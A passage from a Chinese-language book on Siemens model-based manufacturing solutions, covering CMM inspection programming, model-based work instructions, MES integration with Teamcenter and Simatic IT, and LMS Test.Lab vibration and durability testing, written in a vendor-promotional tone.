⑨在Teamcenter系统中进行统计输出,用于指导设计和制造。 从图12-4可以看出该流程主要分为两段:一段是NX CMM检测编程;另一段是CMM检测执行。 1.NX CMM检测编程 NX CMM检测编程将基于内置的检测知识和测头资源库,直接获取MBD模型上的检测特征,通过推断引擎,创建出适合的检测路径,如图12-5所示。 图12-5 基于MBD模型的NX CMM检测编程 在进行CMM编程时,通过Link to PMI(链接到产品制造信息)功能,系统将自动识别MBD三维模型上的特征和产品制造信息。 NX CMM检测编程的特点如下。 (1)级编程功能 图12-6 基于MBD进行CMM编程 ·直接基于设计和制造需求完成CMM编程(见图12-6)。 ·直接读取MBD模型数据,且在CMM机床环境中进行编程。 ·针对各种检测特征(点、平面、柱、曲面)和各种GD&T(几何尺寸公差)进行CMM编程。 ·CMM编程与MBD模型保持相关性,确保变更的自动更新。 (2)编程自动化 ·直接读取MBD模型上的GD&T和三维标注等产品制造信息(PMI),自动生成检测程序,基于此,可以缩短最多80%的检测编程时间。 ·通过使用自定义的标准检测路径方法、工具和项目模板,用户就能进一步实现编程过程的自动化(见图12-7)。 图12-7 检测编程自动化 (3)数据的输出可立即用于生产 ·通过三维CMM仿真,验证检测程序的正确性,确保检测程序不产生干涉,符合预期的测量策略。 ·消除在测量机上的费时试测。 ·输出符合要求的后处理数据,包括DMIS标准和机床专用格式的数据。 (4)集成的解决方案(见图12-8) ·利用NX CAD、CAM和CMM应用之间的关联性,就能用设计和制造变更管理快速地更新检测程序。 ·利用Teamcenter进行过程管理和数据管理,就能确保用户始终用正确的文件版本开展工作。无论你的团结成员在哪里,你都可以用这些功能方便地与大家分享参数设置、程序和后处理器等资源。 图12-8 集成的解决方案 (5)易于部署和使用 ·采用基于CMM机床环境的编程和在线工作过程教程,降低人员培训成本,使其快速地适应实际生产。 ·通过对现有西门子PLM软件架构添加NX检编程功能,确保最低的软件成本和部署成本。 2.CMM检测执行 通过NX CMM完成MBD模型的检测程序的编制后,需要将输出的检测程序(DMIS文件)传递到测量机上进行实物的检测,也就是CMM检测执行。 检测程序在测量机上的应用有两种模式:一种是测量机的执行软件为其他公司的软件,例如测量机公司提供的软件;另一种是测量机的执行软件为西门子工业软件公司的CMM Inspection Execution。针对第一种情况,在执行检测时,会将NX CMM输出的DMIS文件传输到其他公司的执行软件,通过转换后,驱动测量机完成实物的检测;针对第二种情况,西门子的CMM Inspection Execution将直接读取NX CMM输出的DMIS文件,驱动测量机完成实物的检测。 CMM Inspection Execution可读取DMIS测量程序,在测量机上对实物进行检测,并对检测的结果进行分析。它支持30多种测量设备,通过I++接口实现与测量设备的连接(见图12-9),它的特点如下。 ·CMM检测执行模块(见图12-10)是一个简单易用的运行CMM的工具,采用web通用界面。 ·能够收集所有的测量数据。 ·能够基于统一的ASME和ISO标准分析测量数据,并将实际测量的数据与名义模型和公差进行对比分析,判断零件是否合格。 ·输出符合行业标准的xml格式的检测报告。 ·通过私有接口、标准的I++接口、OOTB支持更广范围的CMMS。 ·可以自定义用户界面和检测报告的格式。 ·支持扫描(scanning)CMM和Renishaw Revo。 12.3 价值体现 西门子基于MBD的数字化检测解决方案提供了从CMM检测编程到CMM检测执行的功能,涵盖了从制造工程到生产执行的环节。西门子数字化检测解决方案与三维尺寸公差仿真(VA)、测量数据统计分析(DPV)一起构成了全面的质量管理体系,进一步帮助提升产品制造质量。 西门子基于MBD的数字化检测解决方案的价值体现: ·极大地缩短了编程时间(最低可降低80%)。 ·确保按公司标准检查所有的零部件是否合乎要求。 ·捕捉并分享最佳实践方案。 ·无须物理部件或机床,就能创建离线程序。 ·有利于在整个流程中快速高效地传达设计变更要求。 ·简化了软件部署的足迹(只需一套系统,就能实现CAD、CAM和CMM)。 ·确保最低的培训要求。 第13章 基于模型的作业指导书解决方案 13.1 业务挑战 1.三维下车间无处下手 有了三维设计模型,如何将三维设计模型应用到工艺和现场,是很多制造企业头疼的问题。甚至有些企业认为直接将三维设计模型搬到车间屏幕就万事大吉;更有些企业在设计时采用三维,而在工艺和现场环节却用到二维,使三维转二维,甚至直接在卡片中贴三维截图。从“道”上讲,这是缺乏MBE的整体认识和适应的管理制度;从“术”上讲,这是缺乏三维下车间的技术手段。 2.传统作业指导执行效率低 传统工艺卡片的特点就是信息扁平和静态,执行效率很低。现场工人除了工艺文件,还需要仔细翻阅大量的关联图纸、标准,而且工艺卡片上的描述往往很简单,工人需要结合自身经验进行消化理解,在执行过程中,工人具有一定自主性,会导致在整个制造生态中,过于依赖工人的经验和技能,从而可能会影响产品的定型和质量。 传统纸质卡片在执行中难于动态调整,不易于直观表现工序的串行、并行和条件判断,这些都需要借助大量的临时更改和现场调度管理。因此经常会出现工作上的失误,造成生产质量问题,影响生产周期。 3.更改贯彻不及时、不彻底 在传统的制造模式中,更改多、贯彻慢、贯彻难,这些都是影响产品质量、研制周期和成本的管理型问题。传统的作业指导也是造成这一后果的重要原因,纸质卡片不便于修改、删除、插入,打印之后在空间上分布也很广,导致更改不及时,贯彻不彻底。 4.现场数据不能及时反馈和管理 在传统模式下,工艺和检验的展示和反馈是脱节的,这样会导致编制工艺的工艺员和执行工艺的现场人员也是脱节的。工艺员不掌握现场情况,很难及时调整工艺,更改时在制的影响分析也不及时不全面,也不能进行细粒度的工艺更改;在有限工期、资源、经验的限制下,现场人员只能充分发挥“主观能动性”;现场管理也只能进行粗放式调度和管理。工艺与执行的脱节,会造成“知行不合一”。 13.2 解决方案 针对不同MBE能力水平的制造企业,西门子可提供满足企业需求的MBI,甚至还可提供不同MBI的并存复合方案。 1.2D PDF(级别1) 2D PDF是基于数字化制造管理平台的工艺结构树输出的二维作业指导,既能打印,也能以电子文件的形式在车间展示,其中有表格、文字,图形。在输出时,系统自动对特殊文字(如零组件代号)进行颜色、字体强调。 图形来自数字化制造管理平台中工序组合视图。工序组合视图是工艺员对设计模型的理解和对过程模型的规划的投影,包含过程模型、设计PMI和工艺PMI,一般是某个特定视角、剖视图或局部剖视图。这些视图将大大提高执行现场对工艺的理解,比传统作业指导更直观,充分发挥了三维工艺的优点。 2D PDF形式的装配作业指导卡如图13-1所示。 2.3D PDF(级别1) 3D PDF内嵌三维模型可供用户直接浏览、旋转、测量,如果定义了装配路径或者进行了装配工艺仿真,可以按工序/工步播放,并以电子文件的形式在车间展示。三维模型包含对应的工序组合视图。 3D PDF格式的装配作指导书如图13-2所示。 3.基于Web的在线作业指导EWI(级别2) EWI是基于Web的在线作业指导(见图13-3),它直接从产品全生命周期管理平台的服务器获取工艺内容,展示的内容包括工艺结构、工序流程图(定义了工序/工步的串行并行)、操作描述、零组件配套表、工艺资源和三维模型。三维模型包含对应的工序组合视图。 图13-1 2D PDF形式的装配作业指导卡 图13-2 3D PDF格式的装配作业指导书 对EWI能做到实时更改、立即贯彻。对于复杂的现场工况,EWI也支持离线模式。 图13-3 基于Web的在线作业指导EWI界面 4.交互式作业指导书IETM(级别2) 交互式电子作业指导书为用户提供一个通用、开放的工艺技术文档定义和出版管理系统;也提供强大的技术文档和内容管理功能;还提供第三方软件集成功能,包括内容编辑、发布工具、翻译工具、查看工具、Office集成。它可直接从PLM服务器获取工艺内容,实现数据共享,确保文档与关联的工程数据完整、一致,并可发布成网页或2D/3D PDF等格式的文档。交互式电子作业指导书主要包括快速拆装手册、快速培训及快速零部件手册等工具。用快速拆装手册工具可创建快速易用的数字化交互产品维护和操作手册;用快速培训工具可将现有的CAD资源和培训文档结合起来生成数字化的交互式三维动画仿真的培训;用快速零部件手册工具可创建数字化的交互式零部件管理库,并以三维爆炸图的方式形象地展示有复杂结构的各零部件之间的连接关系。 5.基于便携终端的作业指导PLM(级别2) iPad版PLM使用移动宽带连接到PLM服务器,能展现数字化制造管理平台的作业指导、图纸和模型,也能进行贯彻更改。考虑复杂的现场工况,该作业指导支持在线模式(连接到PLM)工作或下载内容来离线完成任务。 通过iPad访问Teamcenter的指导现场情况如图13-4所示。 图13-4 通过iPad访问Teamcenter的指导现场 6.基于Simatic IT的EWI(级别3) 通过PLM和MES双向紧密集成,既能实现工艺内容的车间展现,也能实现车间现场操作记录、检验记录的实时反馈,如图13-5所示。 工艺员可以实时了解在制情况,能对工艺进行及时的、细粒度的调整。工艺更改时,基于数字化制造管理平台就能进行在制影响分析,甚至将执行过程暂停在即将更改的工序/工步之前,既提高了效率,又减少了返工和报废概率。 支持结构化的更改管理对车间计划和派工的实时调整,大大减少临时更改和临时调度。 图13-5 整合工艺展现和现场反馈 13.3 价值体现 1.提高现场执行效率 MBI具有直观、易懂的特点,缩短了原来的读图及对图的理解消化时间。MBI电子化和实物技术状态管理的电子化至少可以减少90%的相关查询时间。MBI对零组件、原材料、工艺资源的配套使用定义清晰,过程描述可视化,关联查询方便,大大提高了现场执行效率。 2.提升现场管理水平 结构化的更改管理减少了临时更改、超越等需要人工调度干预的情况,现场过程可控可管可追溯,提高了现场管理水平。 3.提高产品质量 MBI的过程定义和检验定义的可视化和细节化,减少了现场的工人误解现象。操作工人的经验以工艺知识的形式体现在MBI中,使得过程操作和过程检验更科学,并能快速反馈和迭代工艺知识,最终提高了产品质量。 4.缩短产品研制周期 作为工艺和现场的纽带,MBI使得“电子分发→发现问题→实时反馈→快速分析→直接在制处理→结构化更改→及时分发贯彻”这样一个快速闭环成为现实,减少了现场的停工、返工、无用工和消极怠工现象,出现的问题也能及时得到合理的修正,现场经验也能回馈到工艺环节,从管理体系上缩短产品研制周期。 第14章 基于模型的制造执行管理 14.1 业务挑战 产品制造执行(MES)是生产现场管理的集成系统平台,接收ERP系统下发的生产主计划、PLM系统产生的制造BOM、工艺路线、作业指导书等工艺数据,进行生产排程、制造执行、数据采集、统计报表等,为管理层提供科学决策用的实时精确数据,并将任务完工信息反馈给ERP系统,将产品实做数据(AsBuilt)提交到PLM系统以用于实物技术状态管理、维护维修及改进优化。 纵观制造业信息化发展历程,主要有以下三个阶段: ·PDM:以产品数据管理为核心。 ·cPDM:以应对产业全球化而产生的多PDM协同。 ·PLM:将数据管理延伸到工艺、工装、验证等,管理产品全生命周期数据和生产过程。 目前,充分利用数字化技术,将前端产品、工艺定义阶段的产品(Product)数据管理与后端产品制造阶段的生产(Production)数据管理融合,实现产品与生产协同生命周期管理,这一融合是企业发展的新动力(见图14-1)。 基于模型的制造执行的主要业务挑战有: ·基于模型设计和工艺数据的产品制造:传统的产品制造都是基于产品设计图纸、工艺卡片进行工作的,对于以3D模型为载体和对象的产品设计数据、工艺数据,如何显示、浏览,如何确保数据的安全及及时更新等,同时机加车间如何将准确的NC代码传递到数控机床,应用于数控加工;装配车间装配现场的仿真结果应用等问题,将是新的业务挑战。 图14-1 产品与生产数据管理的融合是制造业发展新动力 ·基于模型设计和工艺数据的产品检验:探索基于模型3D标注的产品检验模式,手工检验方式向数字化联机检验过渡,事后问题处理向基于统计分析的事前质量问题预防转换。 ·基于模型制造的现场问题反馈:如何实现基于模型的现场问题反馈,减少技术人员在现场处理问题的时间,减少生产等待的时间。 ·基于模型制造的实做数据记录:实做数据的采集,与产品BOM、模型、标注的对应的挑战。数据返回PLM系统进行管理,并用于产品维修与优化的挑战。 14.2 解决方案 西门子提供从产品到生产的“一站式”的完整解决方案,实现从产品、工艺、工装、工厂的虚拟设计与验证,到产品的实物制造、检测、交付等全过程(见图14-2)。 西门子产品与生产集成解决方案以计算机、网络为基础,在Teamcenter中实现产品部分的功能,在Simatic IT中实现生产部分的功能,向上与门户、OA、ERP等业务系统集成,为企业提供业务创新与科学管理的战略决策支撑(见图14-3)。 基于模型的制造执行业务流程如图14-3所示。 ·在Teamcenter中完成产品、工装、工艺、工厂设计与验证后,将产品BOM与工艺BOM送至ERP系统进行主计划编制,形成生产工单与物料BOM,再发送到PLM和MES系统。 ·PLM系统接收到生产工单与物料清单后,与对应版本的产品和工艺数据组合,形成制造工作包,下发给MES系统。 图14-2 西门子从产品到生产的完整产品线 图14-3 制造执行业务流程 ·MES系统接收到生产工单和制造工作包后,进行生产排程和物料准备,然后下发给工作中心进行生产制造、产品检验、数据采集的过程,必要时还进行现场问题反馈,超差品处理。最终将实做数据返回PLM系统,而将计划完工和物料消耗等的数据返回ERP系统。 1.基于模型的产品制造 在工艺系统下发给制造系统的制造工作包中包含了与生产工单对应的产品和工艺数据。这些数据包括BOM、模型、标注,以及必要的2D工程图。工作包将随着设计、工艺或现场需求的更改而实时、可控地更新。各工位操作者在接收到生产任务后,即可在系统中获取对应的工作包,查看相关产品、工艺、资源等数据。 图14-4是Simatic IT的操作界面,表头上是任务、产品、工序、操作者、工件序列号等信息;中间是作业指导书、物料、资源等信息;下部是操作功能区。单击作业指导书,将显示产品、工艺数据,包括3D模型、2D图纸、操作说明,以及仿真动画。同时也提供多种形式的产品3D模型和工艺规程的展示模式。 图14-4 Simatic IT的操作 ·最新版本的静态工艺规程现场应用:以2D PDF格式指导书(见图14-5)进行展示。 ·最新版本的动态工艺规程现场应用:以3D PDF交互式指导书(见图14-6)进行展示。 ·实时的动态工艺规程现场应用,以实时工艺信息展现界面(EWI工具)的WEB页面方式的指导书展现。 2.基于模型的数控加工程序的制造现场应用 基于模型技术进行零部件的数控加工制造,通过后置处理产生NC程序,NC程序在PLM平台中统一进行版本控制和文件管理,通过PLM与DNC的紧密集成,实现基于模型技术的数控加工编程的输出与加工机床的连接。NC程序的管理是将其挂接在工艺结构上的数控工序下,基于工序对象实现版本控制,在统一的流程控制下实现NC程序的下发和回传。PLM、DNC和数控机床集成化应用如图14-7所示。 图14-5 基于模型的作业指导书(2D PDF) 图14-6 基于模型的电子作业指导书(3D PDF) 图14-7 PLM、DNC和数控机床集成化应用 ·NC程序传输到数控机床:工艺人员根据流程指令可选择程序(系统自动保证最新流程中的程序版本),通过DNC接口下发给相应的数控机床。 ·通过查看数控机床和首件试切,机床操作者即可查询到可下传的NC程序列表。NC程序通过同MES系统关联化管理,使机床操作者可以直接查看所执行的具体工序的内容和每个工序使用的NC程序,根据需要,还可以查看工序3D模型和尺寸要求。 ·回传NC程序:对NC程序进行验证和确认之后,通过DNC接口回传确认过的NC程序,扫描到数据回传之后,通知相关工艺员,待工艺员确认之后将相关程序挂接到相应的工艺结构树下。(注意:部分客户根据管理要求,经常在批产阶段,严格控制NC程序回传,而采用单向程序传递来控制NC程序的准确性。) 在西门子提供的解决方案中,通过Shop Floor Connect for Teamcenter(简称SFC for TC)来实现NC程序的下发和回传,如图14-8所示。利用SFC for TC,可以将NC程序文件直接提供给机床控制器。与传统DNC系统不同的是,它与集中式Teamcenter数据库相连,可确保制造数据的安全性,以及从制造计划到生产这整个流程的可控性。它可以避免数据重复并对数据进行版本控制,确保在车间中使用正确的制造数据。借助车间连接,机床操作员可直接访问生产发布数据。操作员可通过作业编号或工作数据包标识符找到生产所需的正确数据文件,包括NC程序、刀具清单、设置表和图纸。当生产团队创建、修改或优化NC程序时,可以将其作为新数据或对现有数据的修订进行保存和维护。 图14-8 SFC for TC简介 3.基于模型的装配现场仿真应用 装配工艺人员通过实时工艺信息展现界面(EWI工具)将装配仿真结果传递到装配工位,装配工人使用每道装配工序的装配仿真结果指导实际装配工作(见图14-9),具体涵盖产品三维模型应用、工装、设备联合仿真应用。 图14-9 基于产品装配过程的仿真过程模拟应用 4.基于模型的产品检验 基于模型的检测技术是从检验工序、检验程序、机床在线检测、三坐标检测、检验结果记录统一管理,一直到检验结果统计分析的产品检验全过程管理。 1)创建检验工序:质量人员需要编制CMM操作书和检验标准。测量程序、资源(设备、工具、测头)、模板等在PDM中管理,同时,在此阶段还要填写工序内容、检验尺寸要求、检验设备,创建检验工序卡片及检验工序模型。 2)创建检验程序:在NX CMM中直接利用3D模型和产品制造信息(PMI)自动生成检测路径。经仿真优化后生成数控测量检测程序(DMIS 5.1),同时可直接或通过i++接口将其用于相关测量设备。根据专检或复检的需求,数控检测工作包(程序、指导书(流卡)、资源清单等)通过TC的车间通道(Shop Floor Connect)下发至测量设备管理执行系统(CMM IE),进而传递到测量机执行检测程序中。 3)检验工序提交审批流程:审核检验工序,批准检验工序,对检验工序卡片完成自动签字。 4)机床在线检测:检验NC程序是否传递到数控机床,进行机床在线检测后,将检验记录和数据通过MES进行数据采集并传递到PDM系统进行报告分析。 5)三坐标测量:由检验员在NX CMM或专用软件中形成检验程序文件,并执行检验。在建立检验程序文件(包括文字+图形+程序文件)的同时执行审批流程。由审批人员进行审批确认,确认后将检验程序传递到三坐标测量仪,以进行检验。 6)三坐标检验:检验人员根据工艺文件和检验工序要求,进行工序级和产品级的检验工作,同时记录检验结果,并将检验结果数据以自动和手工的方式上传到管理平台。 ·检验数据自动上传:进行零部件检测,并将三坐标测量仪自带的测量软件产生的检验测试记录文件上载到管理系统的自动检验管理模块。 ·检验数据手工上传:工序操作完成后,由工人或检验员依据工艺要求的检验项目及使用工具、方法进行检验。检验数据由人工录入系统,并与MBD模型上的尺寸公差标注对应,同时提交到质量系统和制造数据中心,如图14-10所示。 图14-10 工位检验数据输入 7)在管理平台的自动检验管理模块中进行检验和统计分析,可快速生成各种检验结果的统计分析报告并对现场不合格品进行质量分析,例如,可通过调用数据库中的检测结果分析某时间段内的产品检验合格率,以及不同时间段内产品检验合格率对比、工序检验结果等。质量系统依据检验数据进行统计分析、判断超差的关键因素和发展趋势,并提出预防和改进建议。 基于模型的质量数据定义如图14-11所示。质量数据分析如图14-12所示。 5.基于模型的现场问题反馈 在生产现场发现问题后,可直接在产品或工序模型上对其进行可视化标识,并将问题报告发送给PLM系统的责任工艺员,减少了工艺员到现场查看和处理问题的时间,而且对问题的产生过程描述清楚,使工艺员有据可查,如图14-13所示。 图14-11 基于模型的质量数据定义 图14-12 质量数据分析 图14-13 基于模型的现场问题反馈 工艺员在PLM系统接到问题反馈后,调出原始工艺数据,创建针对该批次的工艺更改,并下发给MES系统。同时创建适用于后续批次的新版本工艺数据。 6.基于模型的实做数据管理 令制造执行系统中的产品制造过程、检验结果、消耗的物料、任务批次、工件序列号等信息组成实做数据,并提交给PLM系统以实做BOM的形式(见图14-14)进行管理,构造实物的完整虚拟表现,涵盖质量证明单、装配记录卡、现场问题处理单、超差记录、试验记录单、装配配套表、零部件配套表、全三维模型等,固化和追踪产品实物技术状态,提供MBD三维模式的实物记录。 通过实物零件和设计零件之间的关联,实做数据将关联到模型中,进而实现基于模型的实做数据管理,用于产品的维护、维修,及产品的改进和优化。 图14-14 实做BOM示例 14.3 价值体现 西门子基于模型的制造执行解决方案提供了产品与生产融合平台,有效解决了基于模型的数据在生产现场的查看和应用,实现了基于模型的现场问题反馈,以及基于模型的实做数据采集和反馈。 西门子基于模型的制造执行解决方案的价值体现如下: ·产品与生产的紧密整合的解决方案为现代制造业发展提供了新动力。 ·结合基于模型的产品和工艺数据精确、实时下发生产现场的特点,该方案实现了用精确数字传递与展示设计意图,减少了以往2D与3D多次转换带来精度和时间上的损耗,使工人的操作更规范、便捷,提高了产品的生产效率和质量。 ·基于模型的产品检验更有效地简化了手工操作,提高检验精度和效率,并将检验数据与产品模型、标注关联,实现产品质量数据的统计和分析,达到及早纠正偏差,预防质量问题的发生。 ·实现基于模型的现场问题反馈,有效减少技术员与工人处理问题的时间,提高他们的工作效率和质量,减少现场停工时间。 ·结合基于模型实做数据的采集,以及实做数据返回PLM系统与模型的关联管理,该方案可有效应用于后期产品的维护、维修,以及产品改型、改进设计和制造。 第15章 基于模型的实物样机测试——集成的振动噪声及疲劳耐久性解决方案 15.1 业务挑战 随着工程研发领域的数字化发展,各行业的振动噪声专家及工程师都面临着日益严峻的挑战,尤其是当工作进行到产品实物测试阶段时,就需要更为新颖的解决方案来满足市场的发展需求,客户也要求少花费,而可拥有更个性化、更高品质且更环保耐用的产品。很早以前,人们只是简单地添加减振隔音材料来遮盖噪声,而现在,作为更便捷与高效的试验系统,LMS Test.Lab是基于试验的完整解决方案,具体涉及疲劳耐久性试验、旋转机械试验、结构和声学试验、环境试验、振动控制、电子报告生成以及数据共享等。LMS Test.Lab具有统一的接口并可在不同应用之间进行无缝数据共享。此外,LMS SCADAS系列数据采集系统与Test.Lab的无缝集成在保证最佳数据质量和精度的同时,可高效地完成测试任务。 15.2 解决方案 LMS Test.Lab是振动噪声及疲劳耐久性试验的完整解决方案,可以实现不同应用模块间统一的用户界面及无缝的数据共享。此外,LMS Test.Lab解决方案在单个软硬件系统中便可处理包括标准的、重复的,以及更为复杂的故障诊断试验。 LMS SCADAS系列数据采集系统涵盖从轻巧便携的手机、掌上智能数据采集系统SCADAS XS到自动运行远程控制的Recorder,再到多通道的Lab系统。它们均可根据客户需求随意选择。LMS SCADAS系统可支持多种传感器和信号调理功能,是进行噪声、振动和疲劳耐久测试的理想选择。 1.LMS Test.Lab LMS Test.Lab桌面不仅是其他所有Test.Lab应用软件的启动平台,更是所有包括管理人员、工程师、技术人员等相关人员进行试验、处理数据、生成报告的最基本工具。试验设置和后处理分析可分别在此完成。 2.LMS Test.Lab声学试验 LMS Test.Lab声学试验软件工具为用户提供了从传声器的信号调理和数字人工头的接口,到声功率级的直接测量和实时倍频程分析,再到声音品质工程所需的一切手段,这些都满足最新国际标准的要求和工程实际的需要。 LMS Test.Lab声学解决方案涵盖整个产品开发周期,提供以下完整的声学试验解决方案: ·倍频程试验。 ·声音设计和目标设定。 ·可扩展的产品优化,声音工程和故障诊断处理的先进技术。 ·资格认证和检测。 ·内部检验与试验。 3.LMS Test.Lab结构试验 采用LMS Test.Lab结构试验软件,技术人员能够在不到一天的时间内完成大型模态试验分析。LMS以其在模态试验领域的经验而著称,从小结构的锤击法模态试验,到使用多个激振器和几百个测量通道的大型模态试验。LMS Test.Lab继承并发扬了其传统优势,LMS Test.Lab PolyMAX的模态参数识别方法、自动模态极点选择功能(AMPS)保证了试验结果的快速获取,并且使其不受操作者经验的影响。 4.LMS Test.Lab旋转机械分析 要设计出一款安静、高效且性能可靠的产品,需对发动机、压缩机、电动机、泵以及传动轴所引起的噪声和振动有充分的认知,而这个过程是非常复杂的。为了确定噪声和振动的根源,完成产品的设计优化,工程人员需要具有一套完整的分析手段:瀑布图、阶次跟踪、时域数据分析以及各种信号处理工具。另外还需专门的模块,以高效地完成对大量试验数据的快速分析和显示。无论是在发动机试验间,还是在汽车试验场或是在现场对一个泵进行测试,LMS Test.Lab旋转机械分析软件均可提供所需的技术支持。 5.LMS Test.Lab传递路径分析(TPA) 与市场上众多的传递路径分析解决方案相比,LMS Test.Lab传递路径分析解决方案能够帮助用户从各个可能的角度应对问题。 LMS Test.Lab传递路径分析提供了基于工程试验方法的系统级振动噪声解决方案,以对关键零部件进行工程分析。作为一个全面理解振动噪声问题的方法,TPA可对振动噪声问题进行故障诊断,并对每个关键零部件进行性能目标设定。在一个由多个子结构组成的复杂结构(诸如汽车、飞机或船舶)中,某一特定位置的振动噪声现象往往是由一个远处的振动源所引起的。例如,能量可以通过不同的路径从汽车发动机传入驾驶室内:通过发动机悬置、排气系统连接点,甚至可间接地通过传动轴和底盘悬架传入到驾驶室内。进气和排气系统的空气传播也会对振动噪声问题有一定的影响。LMS Test.Lab传递路径分析技术能够解决这类振动噪声问题,它可以帮助工程师从只有单一悬置激励源的简单系统,到包含多个可调悬置激励源的复杂结构,在设计早期检测到问题产生的根源。 6.LMS Test.Lab振动控制 LMS Test.Lab振动控制为闭环振动控制试验提供一套完整的解决方案,能够帮助试验工程师轻松地对产品进行验证及认证测试,以确保产品能够承受外界的激励,模拟从一般到极端的振动工况条件,以及恶劣的运输条件等。LMS Test.Lab振动控制提供了精确的闭环控制和内置的安全算法,可以将试验中对昂贵试件造成的损伤风险降至最低。解决方案中的用户指南和自动化的自检功能可以让工程师提高工作效率,并保证用户能在严格的时间期限内完成试验任务。LMS Test.Lab振动控制软件经过专门的设计,与具有24位精度的LMS SCADAS控制器硬件紧密集成,在提供最佳的闭环速度的同时,最大程度地确保了系统的安全性。 7.LMS Test.Lab环境试验 LMS Test.Lab环境试验包括两个软件包:振动控制和数据采集。高速多通道振动控制系统为航天器、卫星、系统模型等大型易损结构的认证和验收试验提供了完整的解决方案。这一振动控制系统能够扩展至数百个控制、试验与限幅通道,以便用户可以轻易地完成常规的随机、冲击、正弦和组合试验。用户可以在试验室进行随机或正弦闭环振动控制,同时实现数据并行采集,并对这些信号进行在线处理,同时还能在混响室里对部件进行闭环声学激励试验,还有模拟爆炸分离高频瞬态采集试验等。此外,系统在振动试验的定义上非常灵活,支持非标准试验规范,允许使用来源于实际现场的试验数据以及更为复杂的试验载荷谱。 8.LMS基于模型的闭环耐久性试验与仿真混合解决方案 从真实的设计与采用精确的载荷数据进行验证到加速耐久性试验,再到在设计周期早期采用仿真技术进行耐久性性能评估,LMS提供基于模型的闭环解决方案对设计过程进行从始至终的改进。 (1)基于测试的耐久性工程 尽管虚拟仿真的运用越来越多,但是测试部门实际上仍面临着不断增加的测试工作任务量。产品多样化的激增和日益复杂的测试工况,并没有减少试验产品的使用,反而对试验产品的功能要求越来越高。此外,汽车企业仍然在通过减少样车及测试时间来缩短产品的研发周期。 (2)用精准的载荷进行实际设计和验证 ·LMS SCADAS疲劳耐久性记录仪是恶劣环境下的便携式数据采集系统:作为为了应对恶劣环境设计的移动数据记录仪,它可在极端条件下工作,例如:水、沙尘、冲击和振动。 ·LMS Tecware之耐久性载荷数据处理:贯穿载荷数据整理、关于耐久性的特征分析,以及设计与客户相关联的测试程序的整个流程。 ·LMS Tec.Manager之测试数据管理:管理、搜索和分享测试数据,支持虚拟和试验设计验证。 (3)加速的耐久性测试 ·LMS Tecware之缩短试验室测试周期:通过剔除测量数据中的无损伤事件,来缩短耐久性测试周期。 ·LMS Test.Lab振动控制之冲击振动测试解决方案:提供精确的闭环振动控制以及最大化的内部安全机构,并最小化试验损耗的风险,用于部件的认证和审批。精确的回路控制和最大数量的内置安全机械装置,将测试设备被破坏的风险降至最低。 (4)基于仿真的耐久性工程 更短的开发周期和日益升高的产品质量要求,已经使传统的基于测试的耐久性方法捉襟见肘。在进行物理试验之前,在虚拟样车上进行耐久性性能评估和优化成为唯一的有效选择。 (5)在设计最初期评估耐久性性能 LMS Vitual.Lab综合考虑虚拟样机的各个方面,将有限元、模态分析、多体仿真和疲劳寿命预测集成于软件环境中。 ·LMS Virtual.Lab Motion载荷预测:能够仿真实际运动和机械系统的载荷。通过生成和应用多体模型高度重复使用CAD和FE模型,快速执行重复的仿真,从而对各个阶段的设计方案进行评估。 ·LMS Virtual.Lab Durability精确疲劳寿命预测:能够分析零部件及系统的强度和疲劳。后处理功能能够帮助工程师判断出虚拟样机疲劳损伤的关键位置,同时了解产生疲劳问题的根源。 LMS耐久性试验与仿真解决方案的工作过程如图15-1所示。 图15-1 LMS耐久性试验与仿真解决方案 9.LMS Tec.Manager之试验数据管理系统 通过LMS Tec.Manager,用户可以实现海量试验数据的管理,包括强大的数据查询/检索、分类和链接功能,在考虑通用数据管理标准的情况下,可以灵活地组织工程技术数据,以满足小型开发组、大型工程项目,甚至整个公司的需求。LMS Tec.Manager可以帮助工程师轻松搜索并访问试验数据,使其更好地掌握工程进度,进行更准确的决策。 15.3 应用领域 1.航空航天 LMS Test.Lab提供专业的航空航天业解决方案: ·地面共振试验(GVT)确保飞机或宇宙飞船和其他关键部件的结构完整性。 ·工作模态分析及飞行颤振试验用于评估运行工况下飞行器结构的性能。 ·喷气式发动机的动力性能试验与验证。 ·飞船、卫星及航空航天设备大型模态验证试验(作为认证和验收试验)。 2.汽车工业 LMS Test.Lab为汽车NVH工程提供了一套完整的工具及应用软件。 ·发动机振动噪声试验。 ·扭振测试。 ·齿轮传动噪声试验。 ·制动啸叫试验。 ·传动系统转向灵敏度试验。 ·噪声源识别。 ·声功率试验。 ·声强分布图。 ·噪声源贡献量分析。 ·室内噪声评价。 ·声品质。 ·通过噪声测试。 ·声学材料试验。 ·传递路径分析。 ·工作变形分析。 ·模态试验与分析。 ·工作模态试验与分析。 ·零部件振动认证试验。 同时,LMS Test.Lab还可为重型机械、风能和发电、工程机械、建筑与农用车辆、消费品、商业电子等制造业提供可行的解决方案。 15.4 价值体现 1.完整的振动噪声试验及疲劳耐久性解决方案 LMS Test.Lab是一套完整的集成振动噪声及疲劳耐久性试验解决方案,也是高速多通道数据采集系统和集成的试验、分析、电子报告工具的完美结合。LMS Test.Lab极大地提高了现有设备的工作效率,并在可用的实物样机大幅减少的情况下,仍可获得全面可靠的试验结果。 2.统一的平台 LMS Test.Lab具有独特的基于工作流程的界面,为易用性、工作效率和数据一致性设立了新的行业标准。该软件可以自然地随着试验进程,引导用户完成不同的步骤,对测试和分析参数的最佳设置给出建议。工程师们对LMS Test.Lab与SCADAS数据采集系统之间的无缝集成给予了高度评价,即在一个统一的软、硬件平台上,工程师就能完成所有的室内、外场试验,以及需由数据记录仪完成的试验任务。在数据采集过程中的嵌入式分析加速了试验进程,并保证了整个试验过程的数据正确性。LMS Test.Lab能够在试验现场就对测试结果与试验目的进行验证,追溯产生问题的根源,并确保以最优的方式分配试验时间。 3.探究振动噪声问题的根源 使用LMS Test.Lab,工程师避免了“试测→错误→纠正→再尝试”这样的工作模式。通过集成的分析功能和LMS“源→传递→接收者”的方法,LMS Test.Lab能够指导用户直接找到问题的根源。不同水平的用户均可使用它高效迅速地找到问题产生的根本原因并加以解决。简而言之,LMS Test.Lab这一测试和分析工具,可使工程师的工作更为轻松。 4.实现MBE仿真设计与试验验证的闭环流程 只有可以反映现实世界,仿真模型才有价值。因此,在整个开发过程中,仿真模型都需要高质量的建模及载荷数据。通过对已有部件进行试验、对竞争产品进行对标试验而设定目标,LMS Test.Lab正被深入地用于为仿真早期提供数据。相关试验数据也正越来越多地用于提供载荷及修正仿真模型,对于那些建模非常困难的部件或子系统,试验数据还被系统地用于提供基于试验的部件或子系统的模型。这些试验模型可以方便地集成到LMS Virtual.Lab、LMS Imagine.Lab及其他仿真平台,LMS 